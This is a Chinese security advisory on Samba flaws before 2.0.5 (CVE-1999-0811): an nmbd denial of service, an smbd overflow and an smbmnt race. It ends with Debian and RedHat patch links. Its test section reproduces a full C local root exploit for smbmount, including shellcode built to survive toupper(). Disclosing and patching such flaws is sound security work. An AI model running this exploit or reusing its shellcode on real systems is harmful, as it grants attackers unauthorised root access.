安全研究
安全漏洞
Linux Samba软件包多个远程漏洞
发布日期:1999-07-21
更新日期:1999-07-21
受影响系统:
Samba Samba 2.0.4不受影响系统:
- Debian Linux 2.1
- RedHat Linux 6.0
- RedHat Linux 5.2
- RedHat Linux 4.2
Samba Samba 2.0.5描述:
- Caldera eServer 2.3.1
- Caldera OpenLinux 2.3
BUGTRAQ ID: 536
CVE(CAN) ID: CVE-1999-0811
Samba是在Unix类服务器上运行Netbios服务的程序。使用Samba软件包,可以方便地在Unix和Windows之间共享文件。
Samba软件包2.0.5以前版本中存在多个安全漏洞,第一个是nmbd拒绝服务攻击漏洞。第二个是smbd存在的一个缓冲区溢出漏洞,此漏洞在默认安装情况下不可利用,但如果系统管理员在smb.conf中设置了"message command"选项,攻击者可能利用此漏洞远程获取root权限。第三个是竞争条件漏洞如果smbmnt程序是以suid root属性安装的,攻击者可能利用此漏洞挂接文件系统中的任意目录。
<*来源:Andrew Tridgell (tridge@samba.org)
链接:https://www.redhat.com/support/errata/RHSA-1999-022.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/*
The default parameters to the program
often work, however I have found that the offset parameter sometimes
varies wildly, values between -600 and -100 usually work though, a quick
shell script will scan through these.
*/
/*
** smbexpl -- a smbmount root exploit under Linux
**
** Author: Gerald Britton <gbritton@nih.gov>
**
** This code exploits a buffer overflow in smbmount from smbfs-2.0.1.
** The code does not do range checking when copying a username from
** the environment variables USER or LOGNAME. To get this far into
** the code we need to execute with dummy arguments of a server and a
** mountpoint to use (./a in this case). The user will need to create
** the ./a directory and then execute smbexpl to gain root. This code
** is also setup to use /tmp/sh as the shell as bash-2.01 appears to
** do a seteuid(getuid()) so /bin/sh on my system won't work. Finally
** a "-Q" (an invalid commandline argument) causes smbmount to fail when
** parsing args and terminate, thus jumping into our shellcode.
**
** The shellcode used in this program also needed to be specialized as
** smbmount toupper()'s the contents of the USER variable. Self modifying
** code was needed to ensure that the shellcode will survive toupper().
**
** The quick fix for the security problem:
** chmod -s /sbin/smbmount
**
** A better fix would be to patch smbmount to do bounds checking when
** copying the contents of the USER and LOGNAME variables.
**
*/
#include <stdlib.h>
#include <stdio.h>
#define DEFAULT_OFFSET -202
#define DEFAULT_BUFFER_SIZE 211
#define DEFAULT_ALIGNMENT 2
#define NOP 0x90
/* This shell code is designed to survive being filtered by toupper() */
char shellcode[] =
"\xeb\x20\x5e\x8d\x46\x05\x80\x08\x20\x8d\x46\x27\x80\x08\x20\x40"
"\x80\x08\x20\x40\x80\x08\x20\x40\x40\x80\x08\x20\x40\x80\x08\x20"
"\xeb\x05\xe8\xdb\xff\xff\xff"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int alignment=DEFAULT_ALIGNMENT;
int i;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) alignment = atoi(argv[3]);
printf("bsize=%d offset=%d alignment=%d\n",bsize,offset,alignment);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
fprintf(stderr,"Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) (ptr+alignment);
for (i = 0; i < bsize-alignment; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
ptr = buff + (128 - strlen(shellcode));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
setenv("USER",buff,1);
execl("/sbin/smbmount","smbmount","//a/a","./a","-Q",0);
}
建议:
厂商补丁:
Debian
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
源代码:
http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.diff.gz
MD5 checksum: 1354ea63f79e7fa0b4b71685dbac118b
http://security.debian.org/dists/stable/updates/source/samba_2.0.5a-1.dsc
MD5 checksum: e51aeb259913179b60dbddd0b9e70bf5
http://security.debian.org/dists/stable/updates/source/samba_2.0.5a.orig.tar.gz
MD5 checksum: 497e5f98ed9b520b18e926ff2f7307ba
Alpha 架构:
http://security.debian.org/dists/stable/updates/binary-alpha/samba-common_2.0.5a-1_alpha.deb
MD5 checksum: 48b9651e2cefd6f6ad820ded9ebc9191
http://security.debian.org/dists/stable/updates/binary-alpha/samba_2.0.5a-1_alpha.deb
MD5 checksum: 9bb86e810254fe59feb02e817815b64f
http://security.debian.org/dists/stable/updates/binary-alpha/smbclient_2.0.5a-1_alpha.deb
MD5 checksum: 54a89ad98e1167a3265ff30881618b3f
http://security.debian.org/dists/stable/updates/binary-alpha/smbfs_2.0.5a-1_alpha.deb
MD5 checksum: 596e22cdf0848fcffd1885f16b38cf83
http://security.debian.org/dists/stable/updates/binary-alpha/smbwrapper_2.0.5a-1_alpha.deb
MD5 checksum: 5003fb2a3555daddd3d877529ac65e1e
http://security.debian.org/dists/stable/updates/binary-alpha/swat_2.0.5a-1_alpha.deb
MD5 checksum: e99ec78abdac4a8ab1348773e3fa32cd
Intel ia32 架构:
http://security.debian.org/dists/stable/updates/binary-i386/samba-common_2.0.5a-1_i386.deb
MD5 checksum: eb8b9aa964912975db301f1e83919d36
http://security.debian.org/dists/stable/updates/binary-i386/samba_2.0.5a-1_i386.deb
MD5 checksum: 799ab1a56dd726548c33a130edfb9231
http://security.debian.org/dists/stable/updates/binary-i386/smbclient_2.0.5a-1_i386.deb
MD5 checksum: f5db7b12b67b24048d7ff915c9ec77ee
http://security.debian.org/dists/stable/updates/binary-i386/smbfs_2.0.5a-1_i386.deb
MD5 checksum: b6e90edf5db22cf3952a01f726cb7dd7
http://security.debian.org/dists/stable/updates/binary-i386/smbwrapper_2.0.5a-1_i386.deb
MD5 checksum: afabbae0e5ffdd03475a302586d75be5
http://security.debian.org/dists/stable/updates/binary-i386/swat_2.0.5a-1_i386.deb
MD5 checksum: bd235e608944c7cd3cc7a17fceab0199
Motorola 680x0 架构:
http://security.debian.org/dists/stable/updates/binary-m68k/samba-common_2.0.5a-1_m68k.deb
MD5 checksum: 91d8b04d9ef76ca08fff5938007eb235
http://security.debian.org/dists/stable/updates/binary-m68k/samba_2.0.5a-1_m68k.deb
MD5 checksum: 6404ca678a20ad17e44b6c74cc3182a1
http://security.debian.org/dists/stable/updates/binary-m68k/smbclient_2.0.5a-1_m68k.deb
MD5 checksum: 37f0a04da50f9880b22cb3eaf27b2794
http://security.debian.org/dists/stable/updates/binary-m68k/smbfs_2.0.5a-1_m68k.deb
MD5 checksum: 3685040bee6e01039f6588f97dab2c26
http://security.debian.org/dists/stable/updates/binary-m68k/smbwrapper_2.0.5a-1_m68k.deb
MD5 checksum: 1a43221c50137cbf5d94f7ad90ab548e
http://security.debian.org/dists/stable/updates/binary-m68k/swat_2.0.5a-1_m68k.deb
MD5 checksum: 7b5e610c9b044fe81ac66881ea59af64
Sun Sparc 架构:
http://security.debian.org/dists/stable/updates/binary-sparc/samba-common_2.0.5a-1_sparc.deb
MD5 checksum: f4713291f719de2f32543e0fc37506ea
http://security.debian.org/dists/stable/updates/binary-sparc/samba_2.0.5a-1_sparc.deb
MD5 checksum: afb22260c07c60e4afd390bb3e108674
http://security.debian.org/dists/stable/updates/binary-sparc/smbclient_2.0.5a-1_sparc.deb
MD5 checksum: 28b22378ddb79b05d29b4b4fac2038c4
http://security.debian.org/dists/stable/updates/binary-sparc/smbfs_2.0.5a-1_sparc.deb
MD5 checksum: 8747b52257b451a1e19c93ea10048369
http://security.debian.org/dists/stable/updates/binary-sparc/smbwrapper_2.0.5a-1_sparc.deb
MD5 checksum: 420bfe236fcc1591175acd7eb3ad83e0
http://security.debian.org/dists/stable/updates/binary-sparc/swat_2.0.5a-1_sparc.deb
MD5 checksum: 38380d76284421c18e557e2d3a413a62
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-1999:022-02)以及相应补丁:
RHSA-1999:022-02:New Samba packages for Red Hat Linux 4.2, 5.2, 6.0
链接:https://www.redhat.com/support/errata/RHSA-1999-022.html
补丁下载:
Intel:
ftp://updates.redhat.com/6.0/i386/
samba-2.0.5a-1.i386.rpm
samba-client-2.0.5a-1.i386.rpm
Alpha:
ftp://updates.redhat.com/6.0/alpha/
samba-2.0.5a-1.alpha.rpm
samba-client-2.0.5a-1.alpha.rpm
SPARC:
ftp://updates.redhat.com/6.0/sparc/
samba-2.0.5a-1.sparc.rpm
samba-client-2.0.5a-1.sparc.rpm
可使用下列命令安装补丁:
rpm -Fvh [文件名]
浏览次数:11896
严重程度:0(网友投票)
绿盟科技给您安全的保障